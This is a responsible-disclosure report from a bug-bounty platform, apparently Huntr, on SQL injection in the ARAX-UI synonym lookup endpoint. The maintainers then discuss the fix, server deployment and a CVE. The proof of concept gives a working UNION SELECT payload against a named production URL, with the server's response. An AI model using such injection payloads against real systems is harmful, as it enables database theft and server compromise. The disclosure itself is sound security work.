SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in rtxteam/rtx
Reported on
Apr 16th 2022
Description
The /rtxcomplete/nodeslike endpoint in the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. It is possible to include a malicious SQL payload in the word query parameter for this endpoint that would allow an attacker to dump the database, make modifications to data, or delete data. In addition it is possible to completely takeover the server where the application is hosted, by performing remote code execution via this vulnerability.
Proof of Concept
Perform a GET request to:
https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018
The server will return JSON in the HTTP response, with the SQLite version as "3.11.0" as part of the first item in the array:
jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);
Impact
This vulnerability is critical as it can lead to remote code execution and thus complete server takeover.
SECURITY.md
a year ago
Thank you for reporting this issue. We have created a SECURITY.md file per your suggestion sent via email. We are working on a fix for this issue. Thank you for keeping the issue private until we have had a chance to fix it.
Thank you, we have fixed the issue with commit https://github.com/RTXteam/RTX/commit/fa2797e656e3dba18f990a2db1f0f029d41f1921
Thank you for reporting this issue to our team.
Thanks for the update @maintainer! @admin can we get a CVE for this?
@maintainer - are you able to mark as valid and fixed using the resolve button below?
Hi Jordan, what is a CVE? Please pardon my ignorance.
Hi @maintainer. No problem, happy to help. A CVE is simply an ID for this vulnerability. The mission of the CVE Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. There is one CVE Record for each vulnerability in the catalog. The vulnerabilities are discovered then assigned and published by organizations from around the world that have partnered with the CVE Program, such as this platform (Huntr). Please see here for more info: https://www.cve.org/About/Overview
Just for further clarity, we take care of the entire CVE process for you, so there is nothing for you to do, except give us the go-ahead to publish one 👍
Thank you, Jordan. It turns out we have deployed the fix to one of our two production servers. Deployment to another production server involves coordinating with a federal agency (NIH) and may take a few days. Thank you for your patience.
Hi Jordan and Jamie, OK, I have confirmed that the patch was also deployed to the NIH's servers, and thus, we are ready to resolve this issue. Thank you for your patience, and big thank you for reporting this security vulnerability through the huntr.dev program.
Great work to all involved! 👍
A CVE has been assigned and should be published shortly. More generally, this makes the rtxteam look like they take security seriously and are doing a great job at resolving security issues :)